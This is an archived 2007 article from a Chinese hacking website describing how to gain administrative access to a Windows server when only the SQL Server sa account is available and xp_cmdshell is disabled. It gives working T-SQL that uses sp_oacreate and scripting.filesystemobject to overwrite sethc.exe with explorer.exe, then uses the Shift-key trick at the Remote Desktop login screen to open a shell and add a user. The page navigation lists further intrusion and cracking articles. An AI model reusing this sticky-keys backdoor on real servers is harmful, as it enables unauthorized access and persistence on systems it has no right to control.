文章 | 入侵攻击 | 安全防御 | 电脑知识 | 建站技术 | 网络编程 | 网络知识 | 工具使用 | 新闻资讯 | 安全公告

下载 | 漏洞扫描 | 加密破解 | 入侵攻击 | 后门木马 | 溢出程序 | 综合工具 | 安全防护 | 原创作品 | 动画教程

论坛 | 黑客军火 | 配服务器 | 黑客情感 | 免费资源 | 被黑网站 | 美女贴图 | 会员照片 | 在线服务 | 网站首页

  当前位置:主页 > 技术文摘 > 入侵攻击 > 文章内容   您对新版的建议

无xp_cmdshell下取权限又一简单方法

www.hx99.org 阅读: 时间:2007-12-12 整理:华西黑盟
------------------------------------------------------------------
 

文章作者:charley008
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

有了sa但无xp_cmdshell ,怎么恢复都提示出错。好象是xxxx.cpp哪里哪里出错。或者找不到指定模块,反正我遇到好多次了。在用exec sp_oacreate 'wscript.shell'也没办法的情况下。。可用此方法
(很多服务器都把'wscript.shell'给删了。)
看到既然能用sp_oacreate,sp_oamethod来弄'wscript.shell'或者scripting.filesystemobject
网上看到的文章都只有几个用法就是'wscript.shell'执行命令或者scripting.filesystemobject来写入木马或读取文件。于是乎应该可以也能复制,删除文件吧。。
上网找了些资料,得到下面方法:
复制文件:

declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';

declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';

成功后3389登陆按五次shift键。成功进入服务器。一直向上点”我的电脑“右键“管理” 用户管理直接加用户。
此法随无技术可言,希望对某些人有点用。
   ---------------------------------------------------------------------------------------------------
  上一篇:利用serv-u拿下网上商城
  下一篇:简简单单清除肉鸡上的日志文件
   ---------------------------------------------------------------------------------------------------
用户名:
Email:
评论内容:
 
  精品推荐
密码失而复得 RAR文件密码
破解WEP无线网络密码详细
一次局域网入侵全过程-完
黑客如何破坏杀毒软件
入侵董燕妮个人网站全过程
破解密码相关心理学知识
经典入侵检测术语全接触
Ms08-067 Exp 详细测试流
Cookies的注入方法和原理
另类破解双系统Vista密码
资深黑客浅谈文件捆绑技术
渗透韩国服务器
免杀技术详解
新的挂马方式ARP欺骗挂马
入侵超变态动网论坛
社会工程学的全方位讲解与
PcShare 免杀 附加数据
SQL注射修改难猜解的MD5
利用WEBSHELL直接进入后台
上网特权我来定
使用CSS进行的攻击
利用MS08-058攻击Google
跨站跨出WEBSHELL
多思路WEB入侵
检测周杰伦官方网站
关于我们 | 发展历程 | 在线投稿 | 核心监督 | 友情链接 | 网站地图 | 网站留言 | 联系我们
Copyright © 2004-2009 Www.Hx99.Net
版本:华西黑盟网站系统V6.0 Email:root#hx99.org
中国·西安·宝鸡 请使用IE6.0版本, 分辩率1024×768进行浏览
版权所有 任意抄袭 注意完整
陕ICP备06000444号